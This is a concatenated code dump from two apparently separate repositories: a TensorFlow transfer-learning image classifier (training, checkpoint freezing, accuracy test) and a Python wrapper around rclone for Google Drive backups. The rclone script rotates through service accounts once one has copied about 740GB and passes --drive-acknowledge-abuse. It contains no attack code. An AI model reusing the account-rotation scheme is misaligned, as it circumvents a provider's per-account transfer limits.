foldName = path
data, label = load_img_path(craterDir,foldName, i)
train_imgs.extend(data)
train_labels.extend(label)
print ("文件名对应的label:")
print (path, i)
#打乱数据集
train_imgs, train_labels = shuffle_train_data(train_imgs, train_labels)
return train_imgs, train_labels
def get_next_batch_from_path(image_path, image_labels, pointer, IMAGE_HEIGHT=299, IMAGE_WIDTH=299, batch_size=64, is_train=True):
batch_x = np.zeros([batch_size, IMAGE_HEIGHT,IMAGE_WIDTH,3])
num_classes = len(image_labels[0])
batch_y = np.zeros([batch_size, num_classes])
for i in range(batch_size):
image = cv2.imread(image_path[i+pointer*batch_size])
image = cv2.resize(image, (int(IMAGE_HEIGHT*1.5), int(IMAGE_WIDTH*1.5)))
if is_train:
image = random_flip(image)
image = random_rotation(image)
image = random_crop(image)
image = random_exposure(image)
image = cv2.resize(image, (IMAGE_HEIGHT, IMAGE_WIDTH))
# 选择自己预处理方式:
'''
m = image.mean()
s = image.std()
min_s = 1.0/(np.sqrt(image.shape[0]*image.shape[1]))
std = max(min_s, s)
image = (image-m)/std'''
# image = (image-127.5)
image = image / 255.0
image = image - 0.5
image = image * 2
batch_x[i,:,:,:] = image
# print labels[i+pointer*batch_size]
batch_y[i] = image_labels[i+pointer*batch_size]
return batch_x, batch_y
def test():
craterDir = "train"
data, label = load_database(craterDir)
print (data.shape)
print (len(data))
print (data[0].shape)
print (label[0])
batch_x, batch_y = get_next_batch_from_path(data, label, 0, IMAGE_HEIGHT=299, IMAGE_WIDTH=299, batch_size=64, is_train=True)
print (batch_x)
print (batch_y)
if __name__ == '__main__':
test()
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
slim = tf.contrib.slim
import numpy as np
import argparse
import os
from PIL import Image
from datetime import datetime
import math
import time
try:
from load_image import load_database_path, get_next_batch_from_path
except:
from load_image.load_image import load_database_path, get_next_batch_from_path
try:
from train import train
except:
from train_net.train import train
import cv2
import os
from keras.utils import np_utils
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import config
if __name__ == '__main__':
IMAGE_HEIGHT = config.IMAGE_HEIGHT
IMAGE_WIDTH = config.IMAGE_WIDTH
num_classes = config.num_classes
# epoch
epoch = config.epoch
batch_size = config.batch_size
# 模型的学习率
learning_rate = config.learning_rate
keep_prob = config.keep_prob
##----------------------------------------------------------------------------##
# 设置训练样本的占总样本的比例:
train_rate = config.train_rate
# 每个类别保存到一个文件中,放在此目录下,只要是二级目录就可以。
craterDir = config.craterDir
# 选择需要的模型
# arch_model="arch_inception_v4"; arch_model="arch_resnet_v2_50"; arch_model="vgg_16"
arch_model=config.arch_model
# 设置要更新的参数和加载的参数,目前是非此即彼,可以自己修改哦
checkpoint_exclude_scopes = config.checkpoint_exclude_scopes
# 迁移学习模型参数
checkpoint_path=config.checkpoint_path
##----------------------------------------------------------------------------##
print ("-----------------------------load_image.py start--------------------------")
# 准备训练数据
X_sample, Y_sample = load_database_path(craterDir)
image_n = len(X_sample)
# 样本的总数量
print ("样本的总数量:")
print (image_n)
# 定义90%作为训练样本
train_n = int(image_n*train_rate)
valid_n = int(image_n*(1-train_rate))
train_data, train_label = X_sample[0:train_n], Y_sample[0:train_n]
# 定位10%作为测试样本
valid_data, valid_label = X_sample[train_n:image_n], Y_sample[train_n:image_n]
# ont-hot
train_label = np_utils.to_categorical(train_label, num_classes)
valid_label = np_utils.to_categorical(valid_label, num_classes)
##----------------------------------------------------------------------------##
print ("-----------------------------train.py start--------------------------")
train(train_data,train_label,valid_data,valid_label,train_n,valid_n,IMAGE_HEIGHT,IMAGE_WIDTH,learning_rate,num_classes,epoch,batch_size,keep_prob,
arch_model, checkpoint_exclude_scopes, checkpoint_path)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import numpy as np
import tensorflow as tf
slim = tf.contrib.slim
import numpy as np
import argparse
import os
from PIL import Image
from datetime import datetime
import math
import time
import cv2
from keras.utils import np_utils
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
try:
from load_image import load_database_path, get_next_batch_from_path, shuffle_train_data
except:
from load_image.load_image import load_database_path, get_next_batch_from_path, shuffle_train_data
# inception_v4
try:
from inception_v4 import inception_v4_arg_scope, inception_v4
except:
from net.inception_v4.inception_v4 import inception_v4_arg_scope, inception_v4
# resnet_v2_50, resnet_v2_101, resnet_v2_152
try:
from resnet_v2 import resnet_arg_scope, resnet_v2_50
except:
from net.resnet_v2.resnet_v2 import resnet_arg_scope, resnet_v2_50
# vgg16, vgg19
try:
from vgg import vgg_arg_scope, vgg_16
except:
from net.vgg.vgg import vgg_arg_scope, vgg_16
def arch_inception_v4(X, num_classes, dropout_keep_prob=0.8, is_train=False):
arg_scope = inception_v4_arg_scope()
with slim.arg_scope(arg_scope):
net, end_points = inception_v4(X, is_training=is_train)
with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
with tf.variable_scope('Logits_out'):
# 8 x 8 x 1536
net = slim.avg_pool2d(net, net.get_shape()[1:3], padding='VALID',
scope='AvgPool_1a_out')
# 1 x 1 x 1536
net = slim.dropout(net, dropout_keep_prob, scope='Dropout_1b_out')
net = slim.flatten(net, scope='PreLogitsFlatten_out')
# 1536
net = slim.fully_connected(net, 256, activation_fn=tf.nn.relu, scope='Logits_out0')
net = slim.fully_connected(net, num_classes, activation_fn=None,scope='Logits_out1')
return net
def arch_resnet_v2_50(X, num_classes, dropout_keep_prob=0.8, is_train=False):
arg_scope = resnet_arg_scope()
with slim.arg_scope(arg_scope):
net, end_points = resnet_v2_50(X, is_training=is_train)
with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
with tf.variable_scope('Logits_out'):
net = slim.conv2d(net, 1000, [1, 1], activation_fn=None, normalizer_fn=None, scope='Logits_out0')
net = slim.dropout(net, dropout_keep_prob, scope='Dropout_1b_out0')
net = slim.conv2d(net, 200, [1, 1], activation_fn=None, normalizer_fn=None, scope='Logits_out1')
net = slim.dropout(net, dropout_keep_prob, scope='Dropout_1b_out1')
net = slim.conv2d(net, num_classes, [1, 1], activation_fn=None, normalizer_fn=None, scope='Logits_out2')
net = tf.squeeze(net,[1,2], name='SpatialSqueeze')
return net
def arch_vgg16(X, num_classes, dropout_keep_prob=0.8, is_train=False):
arg_scope = vgg_arg_scope()
with slim.arg_scope(arg_scope):
net, end_points = vgg_16(X, is_training=is_train)
with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
with tf.variable_scope('Logits_out'):
net = slim.conv2d(net, num_classes, [1, 1],activation_fn=None,normalizer_fn=None,scope='fc8')
net = tf.squeeze(net,[1,2], name='fc8/squeezed')
return net
def g_parameter(checkpoint_exclude_scopes):
exclusions = []
if checkpoint_exclude_scopes:
exclusions = [scope.strip() for scope in checkpoint_exclude_scopes.split(',')]
print (exclusions)
# 需要加载的参数。
variables_to_restore = []
# 需要训练的参数
variables_to_train = []
for var in slim.get_model_variables():
# 切记不要用下边这个,这是个天大的bug,调试了3天。
# for var in tf.trainable_variables():
excluded = False
for exclusion in exclusions:
if var.op.name.startswith(exclusion):
excluded = True
variables_to_train.append(var)
print ("ok")
print (var.op.name)
break
if not excluded:
variables_to_restore.append(var)
return variables_to_restore,variables_to_train
def train(train_data,train_label,valid_data,valid_label,train_n,valid_n,IMAGE_HEIGHT,IMAGE_WIDTH,learning_rate,num_classes,epoch,batch_size=64,keep_prob=0.8,
arch_model="arch_inception_v4",checkpoint_exclude_scopes="Logits_out", checkpoint_path="pretrain/inception_v4/inception_v4.ckpt"):
X = tf.placeholder(tf.float32, [None, IMAGE_HEIGHT, IMAGE_WIDTH, 3])
#Y = tf.placeholder(tf.float32, [None, 4])
Y = tf.placeholder(tf.float32, [None, num_classes])
is_training = tf.placeholder(tf.bool, name='is_training')
k_prob = tf.placeholder(tf.float32) # dropout
# 定义模型
if arch_model == "arch_inception_v4":
net = arch_inception_v4(X, num_classes, k_prob, is_training)
elif arch_model == "arch_resnet_v2_50":
net = arch_resnet_v2_50(X, num_classes, k_prob, is_training)
elif arch_model == "vgg_16":
net = arch_vgg16(X, num_classes, k_prob, is_training)
#
variables_to_restore,variables_to_train = g_parameter(checkpoint_exclude_scopes)
# loss function
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = Y, logits = net))
# loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels = Y, logits = net))
var_list = variables_to_train
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss, var_list=var_list)
predict = tf.reshape(net, [-1, num_classes])
max_idx_p = tf.argmax(predict, 1)
max_idx_l = tf.argmax(Y, 1)
correct_pred = tf.equal(max_idx_p, max_idx_l)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# tensorboard
with tf.name_scope('tmp/'):
tf.summary.scalar('loss', loss)
tf.summary.scalar('accuracy', accuracy)
summary_op = tf.summary.merge_all()
#------------------------------------------------------------------------------------#
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
#
log_dir = arch_model + '_log'
if not os.path.exists(log_dir):
os.makedirs(log_dir)
writer = tf.summary.FileWriter(log_dir, sess.graph)
saver2 = tf.train.Saver(tf.global_variables())
model_path = 'model/fine-tune'
net_vars = variables_to_restore
saver_net = tf.train.Saver(net_vars)
# checkpoint_path = 'pretrain/inception_v4.ckpt'
saver_net.restore(sess, checkpoint_path)
# saver2.restore(sess, "model/fine-tune-1120")
for epoch_i in range(epoch):
for batch_i in range(int(train_n/batch_size)):
images_train, labels_train = get_next_batch_from_path(train_data, train_label, batch_i, IMAGE_HEIGHT, IMAGE_WIDTH, batch_size=batch_size, is_train=True)
los, _ = sess.run([loss,optimizer], feed_dict={X: images_train, Y: labels_train, k_prob:keep_prob, is_training:True})
# print (los)
if batch_i % 100 == 0:
images_valid, labels_valid = get_next_batch_from_path(valid_data, valid_label, batch_i%(int(valid_n/batch_size)), IMAGE_HEIGHT, IMAGE_WIDTH, batch_size=batch_size, is_train=False)
ls, acc = sess.run([loss, accuracy], feed_dict={X: images_valid, Y: labels_valid, k_prob:1.0, is_training:False})
print('Batch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(batch_i, ls, acc))
#if acc > 0.90:
# saver2.save(sess, model_path, global_step=batch_i, write_meta_graph=False)
elif batch_i % 20 == 0:
loss_, acc_, summary_str = sess.run([loss, accuracy, summary_op], feed_dict={X: images_train, Y: labels_train, k_prob:1.0, is_training:False})
writer.add_summary(summary_str, global_step=((int(train_n/batch_size))*epoch_i+batch_i))
print('Batch: {:>2}: Training loss: {:>3.5f}, Training accuracy: {:>3.5f}'.format(batch_i, loss_, acc_))
print('Epoch===================================>: {:>2}'.format(epoch_i))
valid_ls = 0
valid_acc = 0
for batch_i in range(int(valid_n/batch_size)):
images_valid, labels_valid = get_next_batch_from_path(valid_data, valid_label, batch_i, IMAGE_HEIGHT, IMAGE_WIDTH, batch_size=batch_size, is_train=False)
epoch_ls, epoch_acc = sess.run([loss, accuracy], feed_dict={X: images_valid, Y: labels_valid, k_prob:1.0, is_training:False})
valid_ls = valid_ls + epoch_ls
valid_acc = valid_acc + epoch_acc
print('Epoch: {:>2}: Validation loss: {:>3.5f}, Validation accuracy: {:>3.5f}'.format(epoch_i, valid_ls/int(valid_n/batch_size), valid_acc/int(valid_n/batch_size)))
if valid_acc/int(valid_n/batch_size) > 0.90:
saver2.save(sess, model_path, global_step=epoch_i, write_meta_graph=False)
print('>>>>>>>>>>>>>>>>>>>shuffle train_data<<<<<<<<<<<<<<<<<')
# 每个epoch,重新打乱一次训练集:
train_data, train_label = shuffle_train_data(train_data, train_label)
writer.close()
sess.close()
if __name__ == '__main__':
IMAGE_HEIGHT = 299
IMAGE_WIDTH = 299
num_classes = 4
# epoch
epoch = 100
batch_size = 16
# 模型的学习率
learning_rate = 0.00001
keep_prob = 0.8
##----------------------------------------------------------------------------##
# 设置训练样本的占总样本的比例:
train_rate = 0.9
# 每个类别保存到一个文件中,放在此目录下,只要是二级目录就可以。
craterDir = "train"
# arch_model="arch_inception_v4"; arch_model="arch_resnet_v2_50"; arch_model="vgg_16"
arch_model="arch_inception_v4"
checkpoint_exclude_scopes = "Logits_out"
checkpoint_path="pretrain/inception_v4/inception_v4.ckpt"
##----------------------------------------------------------------------------##
X_sample, Y_sample = load_database_path(craterDir)
image_n = len(X_sample)
# 样本的总数量
print ("样本的总数量:")
print (image_n)
# 定义90%作为训练样本
train_n = int(image_n*train_rate)
valid_n = int(image_n*(1-train_rate))
train_data, train_label = X_sample[0:train_n], Y_sample[0:train_n]
# 定位10%作为测试样本
valid_data, valid_label = X_sample[train_n:image_n], Y_sample[train_n:image_n]
# ont-hot
train_label = np_utils.to_categorical(train_label, num_classes)
valid_label = np_utils.to_categorical(valid_label, num_classes)
##----------------------------------------------------------------------------##
print ("-----------------------------train.py start--------------------------")
train(train_data,train_label,valid_data,valid_label,train_n,valid_n,IMAGE_HEIGHT,IMAGE_WIDTH,learning_rate,num_classes,epoch,batch_size,keep_prob,
arch_model,checkpoint_exclude_scopes, checkpoint_path)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng
wechat: lp9628
blog: http://blog.csdn.net/u014365862/article/details/78422372
"""
import tensorflow as tf
slim = tf.contrib.slim
import os.path
import argparse
from tensorflow.python.framework import graph_util
from inception_v4 import *
from inception_preprocessing import *
MODEL_DIR = "model/"
MODEL_NAME = "frozen_model.pb"
if not tf.gfile.Exists(MODEL_DIR): #创建目录
tf.gfile.MakeDirs(MODEL_DIR)
batch_size = 32
height, width = 299, 299
num_classes = 3
X = tf.placeholder(tf.float32, [None, height, width, 3], name = "inputs_placeholder")
'''
X = tf.placeholder(tf.uint8, [None, None, 3],name = "inputs_placeholder")
X = tf.image.encode_jpeg(X, format='rgb') # 单通道用 'grayscale'
X = tf.image.decode_jpeg(X, channels=3)
X = preprocess_for_eval(X, 299,299)
X = tf.reshape(X, [-1,299,299,3])'''
Y = tf.placeholder(tf.float32, [None, num_classes])
#keep_prob = tf.placeholder(tf.float32) # dropout
#keep_prob_fc = tf.placeholder(tf.float32) # dropout
arg_scope = inception_v4_arg_scope()
with slim.arg_scope(arg_scope):
net, end_points = inception_v4(X, is_training=False)
#sess1 = tf.Session()
#saver1 = tf.train.Saver(tf.global_variables())
#checkpoint_path = 'model/inception_v4.ckpt'
#saver1.restore(sess1, checkpoint_path)
with slim.arg_scope([slim.conv2d, slim.max_pool2d, slim.avg_pool2d], stride=1, padding='SAME'):
with tf.variable_scope('Logits_out'):
# 8 x 8 x 1536
net = slim.avg_pool2d(net, net.get_shape()[1:3], padding='VALID',
scope='AvgPool_1a_out')
# 1 x 1 x 1536
dropout_keep_prob = 1.0
net = slim.dropout(net, dropout_keep_prob, scope='Dropout_1b_out')
net = slim.flatten(net, scope='PreLogitsFlatten_out')
# 1536
net = slim.fully_connected(net, 256, activation_fn=tf.nn.relu, scope='Logits_out0')
net = slim.fully_connected(net, num_classes, activation_fn=None,scope='Logits_out1')
# net = tf.nn.softmax(net)
net = tf.nn.sigmoid(net)
predict = tf.reshape(net, [-1, num_classes], name='predictions')
for var in tf.trainable_variables():
print (var.op.name)
def freeze_graph(model_folder):
#checkpoint = tf.train.get_checkpoint_state(model_folder) #检查目录下ckpt文件状态是否可用
#input_checkpoint = checkpoint.model_checkpoint_path #得ckpt文件路径
input_checkpoint = model_folder
output_graph = os.path.join(MODEL_DIR, MODEL_NAME) #PB模型保存路径
output_node_names = "predictions" #原模型输出操作节点的名字
#saver = tf.train.import_meta_graph(input_checkpoint + '.meta', clear_devices=True) #得到图、clear_devices :Whether or not to clear the device field for an `Operation` or `Tensor` during import.
saver = tf.train.Saver()
graph = tf.get_default_graph() #获得默认的图
input_graph_def = graph.as_graph_def() #返回一个序列化的图代表当前的图
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
saver.restore(sess, input_checkpoint) #恢复图并得到数据
#print "predictions : ", sess.run("predictions:0", feed_dict={"input_holder:0": [10.0]}) # 测试读出来的模型是否正确,注意这里传入的是输出 和输入 节点的 tensor的名字,不是操作节点的名字
output_graph_def = graph_util.convert_variables_to_constants( #模型持久化,将变量值固定
sess,
input_graph_def,
output_node_names.split(",") #如果有多个输出节点,以逗号隔开
)
with tf.gfile.GFile(output_graph, "wb") as f: #保存模型
f.write(output_graph_def.SerializeToString()) #序列化输出
print("%d ops in the final graph." % len(output_graph_def.node)) #得到当前图有几个操作节点
for op in graph.get_operations():
#print(op.name, op.values())
print("name:",op.name)
print ("success!")
#下面是用于测试, 读取pd模型,答应每个变量的名字。
graph = load_graph("model/frozen_model.pb")
for op in graph.get_operations():
#print(op.name, op.values())
print("name111111111111:",op.name)
pred = graph.get_tensor_by_name('prefix/inputs_placeholder:0')
print (pred)
temp = graph.get_tensor_by_name('prefix/predictions:0')
print (temp)
def load_graph(frozen_graph_filename):
# We load the protobuf file from the disk and parse it to retrieve the
# unserialized graph_def
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
# Then, we can use again a convenient built-in function to import a graph_def into the
# current default Graph
with tf.Graph().as_default() as graph:
tf.import_graph_def(
graph_def,
input_map=None,
return_elements=None,
name="prefix",
op_dict=None,
producer_op_list=None
)
return graph
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("model_folder", type=str, help="input ckpt model dir", default="model/cnn_model-1700") #命令行解析,help是提示符,type是输入的类型,
# 这里运行程序时需要带上模型ckpt的路径,不然会报 error: too few arguments
aggs = parser.parse_args()
freeze_graph(aggs.model_folder)
# freeze_graph("model/ckpt") #模型目录
# python ckpt_pb.py "model/fine-tune-160"
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""
Created on 2017 10.17
@author: liupeng"""
import numpy as np
import numpy as np
import os
from PIL import Image
import cv2
import csv
import argparse, json, textwrap
import sys
import csv
def result2num(out, image_path):
# print (out)
dc = out[image_path]
# print (dc)
if dc.get("help", ""):
print ("help is true!")
dc.pop('help')
print (">>>>>>>>", dc)
def dict2list(dic:dict):
''''' 将字典转化为列表 '''
keys = dic.keys()
vals = dic.values()
lst = [(key, val) for key, val in zip(keys, vals)]
return lst
dc = sorted(dict2list(dc), key=lambda d:d[1], reverse=True)
# print (dc[0][0])
if dc[0][0] == 'NG1':
return 0
if dc[0][0] == 'NG2':
return 1
if dc[0][0] == 'OK':
return 2
file = open("output.csv", "r")
err_num = 0
sample_num = 0
for r in file:
sample_num = sample_num + 1
# 转为字典
r = eval(r)
# 转为列表
image_path = list(r.keys())
la = 888888888888888
label = str (str(image_path[0]).split('/')[1])
# print (label)
if label == 'NG1':
la = 0
if label == 'NG2':
la = 1
if label == 'OK':
la = 2
print (la)
image_path = str(image_path[0])
res = result2num(r, image_path)
print (res)
if (la != res):
err_num = err_num + 1
print (sample_num)
print (err_num)
acc_num = sample_num - err_num
print ('accuracy >>> ', acc_num/sample_num)
|
[
"/config.py",
"/data_aug/data_aug.py",
"/load_image/load_image.py",
"/main.py",
"/train_net/train_tensorboard.py",
"/z_ckpt_pb/ckpt_pb.py",
"/z_ckpt_pb/test.py"
] |
001kyaw/gdriveautobackupsystem
|
import json
import io
import subprocess
import sys
import time
from signal import signal, SIGINT
from util import arg_parser, config_gen, helpers
import hashlib
PID = 0
# Parameters for script
MAX_TRANSFER_BYTES = (740 * 1e9) # If one account has already copied 740GB (740 * 1e9), switch to next account
TRANSFER_DEAD_THRESHOLD = 60 # If no bytes are transferred after 60 loops (120 seconds), exit
SA_EXIT_TRESHOLD = 3 # If SAs are switched 3 successive times with no transfers, exit
# Exit handler to that kills the RClone process if the script is terminated
def exit_handler(signal_received, frame):
global PID
if helpers.is_windows():
# Windows kill command
kill_cmd = 'taskkill /PID {} /F'.format(PID)
else:
# Every other normal exit command
kill_cmd = 'kill -9 {}'.format(PID)
try:
# Run the command
subprocess.check_call(kill_cmd, shell=True)
except:
# Ignore errors
pass
# Exit the script
sys.exit(0)
# Main function, everything is executed from here
def main():
# Sets the scripts SIGINT handler to our exit_handler
signal(SIGINT, exit_handler)
# Check if RClone is installed, if it isn't, exit
ret = helpers.check_rclone_exists()
# Parse args
args = arg_parser.parse_args()
# Log that rclone was detected
helpers.log('RClone detected: {}'.format(ret), 'INFO', args)
# Generate config
rclone_generated_config_path = args.generated_config_path
source_path = ''
# Use either source remote or source path, if neither exist exit
if args.source:
source_path = args.source
elif args.source_path:
source_path = args.source_path
else:
helpers.log('A source is required, please use either --source or --source_path.', 'ERROR', args)
sys.exit(-1)
# If both a remote and a path exist combine them using RClone syntax
if args.source and args.source_path:
source_path += ":" + args.source_path
# See comments above
destination_path = ''
if args.destination:
destination_path = args.destination
elif args.destination_path:
destination_path = args.destination_path
else:
helpers.log('A destination is required, please use either --destination or --destination_path.', 'ERROR', args)
sys.exit(-1)
if args.destination and args.destination_path:
destination_path += ":" + args.destination_path
# Set id initially to the starting SA id
id = args.sa_start_id
end_id = args.sa_end_id
helpers.log('Generating RClone config file...', 'INFO', args)
# Generate RClone config file
end_id, src_is_crypt, dst_is_crypt = config_gen.gen_rclone_cfg(args, rclone_generated_config_path)
time_start = time.time()
helpers.log('Starting job: {}, at {}'.format(args.name, time.strftime('%H:%M:%S')), 'INFO', args)
helpers.log('Source: ' + source_path, 'INFO', args)
helpers.log('Destination: ' + destination_path, 'INFO', args)
helpers.log('AutoRClone Log: ' + args.log_file, 'INFO', args)
helpers.log('RClone Log: ' + args.rclone_log_file, 'INFO', args)
helpers.log('Calculating source size, please wait', 'INFO', args)
# Initialise exit counter outside of loop so it keeps it's value
exit_counter = 0
error_counter = 0
global_bytes_transferred = 0
while id <= end_id + 1:
if id == end_id + 1:
break
# Construct destination and source labels
src_label = 'src' + '{0:03d}'.format(id) + ':'
dst_label = 'dst' + '{0:03d}'.format(id) + ':'
if src_is_crypt:
src_label = 'src' + '{0:03d}_crypt'.format(id) + ':'
if dst_is_crypt:
dst_label = 'dst' + '{0:03d}_crypt'.format(id) + ':'
# Fix for local paths that do not use a remote
if args.source_path:
if not args.source:
src_label = args.source_path
else:
src_label += args.source_path
if args.destination_path:
if not args.destination:
dst_label = args.destination_path
else:
dst_label += args.destination_path
if id == args.sa_start_id:
amount_to_transfer_bytes = helpers.calculate_path_size(src_label, rclone_generated_config_path)
amount_to_transfer = helpers.convert_bytes_to_best_unit(amount_to_transfer_bytes)
helpers.log('Source size: ' + amount_to_transfer + '\n', 'INFO', args)
# Construct RClone command
rclone_cmd = 'rclone --config {} '.format(rclone_generated_config_path)
if args.copy:
rclone_cmd += 'copy '
elif args.move:
rclone_cmd += 'move '
elif args.sync:
rclone_cmd += 'sync '
else:
helpers.log('Please specify an operation (--copy, --move or --sync)', 'ERROR', args)
sys.exit()
rclone_cmd += '--drive-server-side-across-configs --drive-acknowledge-abuse --ignore-existing --rc '
rclone_cmd += '--rc-addr=\"localhost:{}\" --tpslimit {} --transfers {} --drive-chunk-size {} --bwlimit {} --log-file {} '.format(
args.port, args.tpslimit, args.transfers, args.drive_chunk_size, args.bwlimit, args.rclone_log_file)
if args.dry_run:
rclone_cmd += '--dry-run '
if args.v:
rclone_cmd += '-v '
if args.vv:
rclone_cmd += '-vv '
if args.delete_empty_src_dirs:
rclone_cmd += '--delete-empty-src-dirs '
if args.create_empty_src_dirs:
rclone_cmd += '--create-empty-src-dirs '
# Add source and destination
rclone_cmd += '\"{}\" \"{}\"'.format(src_label, dst_label)
# If we're not on windows append ' &' otherwise append 'start /b ' to the start of rclone_cmd
if not helpers.is_windows():
rclone_cmd = rclone_cmd + " &"
else:
rclone_cmd = "start /b " + rclone_cmd
try:
subprocess.check_call(rclone_cmd, shell=True)
helpers.log('Executing RClone command: {}'.format(rclone_cmd), 'DEBUG', args)
time.sleep(10)
except subprocess.SubprocessError as error:
helpers.log('Error executing RClone command: {}'.format(error), 'ERROR', args)
sys.exit(-1)
# Counter for errors encountered when attempting to get RClone rc stats (per sa)
sa_error_counter = 0
# Counter that's incremented when no bytes are transferred over a time period
dead_transfer_counter = 0
# Updated on each loop
last_bytes_transferred = 0
# Counter for amount of successful stat retrievals from RClone rc (per sa)
sa_success_counter = 0
job_started = False
# Get RClone PID and store it
try:
response = subprocess.check_output('rclone rc --rc-addr="localhost:{}" core/pid'.format(args.port), shell=True, stderr=subprocess.DEVNULL)
pid = json.loads(response.decode('utf-8').replace('\0', ''))['pid']
global PID
PID = int(pid)
except subprocess.SubprocessError as error:
pass
# Loop infinitely until loop is broken out of
while True:
# RClone rc stats command
rc_cmd = 'rclone rc --rc-addr="localhost:{}" core/stats'.format(args.port)
try:
# Run command and store response
response = subprocess.check_output(rc_cmd, shell=True, stderr=subprocess.DEVNULL)
# Increment success counter
sa_success_counter += 1
# Reset error counter
sa_error_counter = 0
if job_started and sa_success_counter >= 9:
sa_error_counter = 0
sa_success_counter = 0
except subprocess.SubprocessError as error:
sa_error_counter += 1
error_counter = error_counter + 1
if sa_error_counter >= 3:
sa_success_counter = 0
if error_counter >= 9:
finish_job(args, time_start)
sys.exit(0)
helpers.log('Encountered 3 successive errors when trying to contact rclone, switching accounts ({}/3)'.format(error_counter/sa_error_counter), 'INFO', args)
break
continue
response_processed = response.decode('utf-8').replace('\0', '')
response_processed_json = json.loads(response_processed)
bytes_transferred = int(response_processed_json['bytes'])
checks_done = int(response_processed_json['checks'])
transfer_speed_bytes = (bytes_transferred - last_bytes_transferred) / 4
# I'm using The International Engineering Community (IEC) Standard, eg. 1 GB = 1000 MB, if you think otherwise, fight me!
best_unit_transferred = helpers.convert_bytes_to_best_unit(bytes_transferred)
transfer_speed = helpers.convert_bytes_to_best_unit(transfer_speed_bytes)
#transfers = response_processed_json['transferring']
#for file in transfers:
# name = file['name']
# name_hashed = hashlib.sha1(bytes(name, encoding='utf8')).hexdigest()
# size_bytes = file['size']
# helpers.log('File: {} ({}) is {} bytes'.format(name, name_hashed, size_bytes), 'DEBUG', args)
# if not name_hashed in file_names:
# file_names.append(name_hashed)
# file_sizes.append(size_bytes)
#helpers.log("file_names = " + str(file_names), 'DEBUG', args)
#helpers.log("file_sizes = " + str(file_sizes), 'DEBUG', args)
#amount_to_transfer_bytes = sum(file_sizes)
#amount_to_transfer = helpers.convert_bytes_to_best_unit(amount_to_transfer_bytes)
bytes_left_to_transfer = int(amount_to_transfer_bytes) - bytes_transferred
eta = helpers.calculate_transfer_eta(bytes_left_to_transfer, transfer_speed_bytes)
helpers.log('{}/{} @ {}/s Files Checked: {} SA: {} ETA: {}'.format(best_unit_transferred, amount_to_transfer, transfer_speed, checks_done, id, eta) + (" " * 10), "INFO", args, end='\r')
# continually no ...
if bytes_transferred - last_bytes_transferred == 0:
dead_transfer_counter += 1
helpers.log('No bytes transferred, RClone may be dead ({}/{})'.format(dead_transfer_counter, TRANSFER_DEAD_THRESHOLD) + (" " * 10), 'DEBUG', args)
else:
dead_transfer_counter = 0
job_started = True
last_bytes_transferred = bytes_transferred
# Stop by error (403, etc) info
if bytes_transferred >= MAX_TRANSFER_BYTES or dead_transfer_counter >= TRANSFER_DEAD_THRESHOLD:
if helpers.is_windows():
kill_cmd = 'taskkill /PID {} /F'.format(PID)
else:
kill_cmd = "kill -9 {}".format(PID)
try:
subprocess.check_call(kill_cmd, shell=True)
helpers.log('Transfer limit reached or RClone is not transferring any data, switching service accounts', 'INFO', args)
amount_to_transfer_bytes -= bytes_transferred
amount_to_transfer = helpers.convert_bytes_to_best_unit(amount_to_transfer_bytes)
global_bytes_transferred += bytes_transferred
except:
pass
if dead_transfer_counter >= TRANSFER_DEAD_THRESHOLD:
try:
exit_counter += 1
except:
exit_counter = 1
else:
# clear cnt if there is one time
exit_counter = 0
# Regard continually exit as *all done*.
if exit_counter >= SA_EXIT_TRESHOLD:
# Exit directly rather than switch to next account.
finish_job(args, time_start)
sys.exit(0)
break
time.sleep(4)
id = id + 1
# TODO implement
def finish_job(args, time_start):
helpers.log('Job FINISHED (this message will be better soon)', 'INFO', args)
if __name__ == "__main__":
main()
--- FILE SEPARATOR ---
class Config:
AAA = "--help"
BBB = "what"
CCC = "fuck"
--- FILE SEPARATOR ---
import os
os.system('hickory schedule back.py --every=1hours')
--- FILE SEPARATOR ---
# coding: utf-8
import argparse
def parse_args():
parser = argparse.ArgumentParser(description='Copy from source (local/publicly shared drive/Team Drive/) '
'to destination (publicly shared drive/Team Drive).')
parser.add_argument('--copy', action='store_true',
help='Copy files from source to destination.')
parser.add_argument('--move', action='store_true',
help='Move files from source to destination.')
parser.add_argument('--sync', action='store_true',
help='Sync the source to the destination, changing the destination only. Doesn’t transfer unchanged files.')
parser.add_argument('-s', '--source', type=str,
help='The source of your files. ID of Team Drive, ID of publicly shared folder or an RClone remote (Must use --rclone-config-path).')
parser.add_argument('-d', '--destination', type=str,
help='The destination for your files. ID of Team Drive, ID of publicly shared folder or an RClone remote (Must use --rclone-config-path).')
parser.add_argument('-sp', '--source-path', type=str, default='',
help='The folder path inside source. (Local Path or path in Google Drive).')
parser.add_argument('-dp', '--destination-path', type=str, default='',
help='The folder path inside the destination. (Local path or path in Google Drive).')
